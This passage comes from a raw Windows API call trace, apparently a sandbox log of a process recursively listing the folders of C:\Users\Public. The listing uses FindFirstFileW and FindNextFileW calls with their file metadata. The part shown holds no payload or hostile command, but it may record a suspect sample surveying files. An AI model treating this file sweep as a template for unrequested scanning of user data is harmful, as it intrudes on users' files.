cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.129] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.129] lstrlenW (lpString="desktop.ini") returned 11 [0071.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0071.129] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0071.129] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.129] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Desktop", cAlternateFileName="")) returned 1 [0071.129] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.129] lstrlenW (lpString="Desktop") returned 7 [0071.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.129] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.129] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.130] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0071.130] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.130] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0071.130] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.130] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.130] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.130] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.130] lstrlenW (lpString="desktop.ini") returned 11 [0071.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.130] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.130] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.130] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.130] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.130] lstrlenW (lpString="desktop.ini") returned 11 [0071.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x4de2e8, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="WINDOW~3.URL")) returned 0xffffffff [0071.131] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.131] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0071.131] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.131] lstrlenW (lpString="My Pictures") returned 11 [0071.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x4de2e8, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="WINDOW~3.URL")) returned 0xffffffff [0071.131] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.131] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0071.131] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.131] lstrlenW (lpString="My Videos") returned 9 [0071.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x4de2e8, ftCreationTime.dwLowDateTime=0x4e1ec8, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="WINDOW~3.URL")) returned 0xffffffff [0071.131] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.131] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0071.131] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.131] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.131] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0071.131] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.131] lstrlenW (lpString="Downloads") returned 9 [0071.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.132] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.132] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.132] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.132] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.132] lstrlenW (lpString="desktop.ini") returned 11 [0071.132] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.132] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.132] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0071.132] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.132] lstrlenW (lpString="Favorites") returned 9 [0071.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.132] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.133] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.133] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0071.133] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.133] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.133] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0071.133] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.133] lstrlenW (lpString="Libraries") returned 9 [0071.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.133] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.133] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.133] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.133] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.133] lstrlenW (lpString="desktop.ini") returned 11 [0071.133] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.134] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.134] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Music", cAlternateFileName="")) returned 1 [0071.134] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.134] lstrlenW (lpString="Music") returned 5 [0071.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.179] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.179] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.179] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.179] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.179] lstrlenW (lpString="desktop.ini") returned 11 [0071.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0071.226] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.226] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.226] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.226] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.226] lstrlenW (lpString="desktop.ini") returned 11 [0071.226] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0071.227] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.227] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0071.227] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.227] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.227] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Pictures", cAlternateFileName="")) returned 1 [0071.227] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.227] lstrlenW (lpString="Pictures") returned 8 [0071.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.228] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, 